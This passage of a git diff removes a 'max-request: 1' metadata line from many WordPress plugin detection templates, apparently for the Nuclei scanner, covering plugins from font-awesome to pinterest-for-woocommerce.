tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 9c6e3e6d2e..1778552d75 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index a038adac53..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: pinterest-for-woocommerce 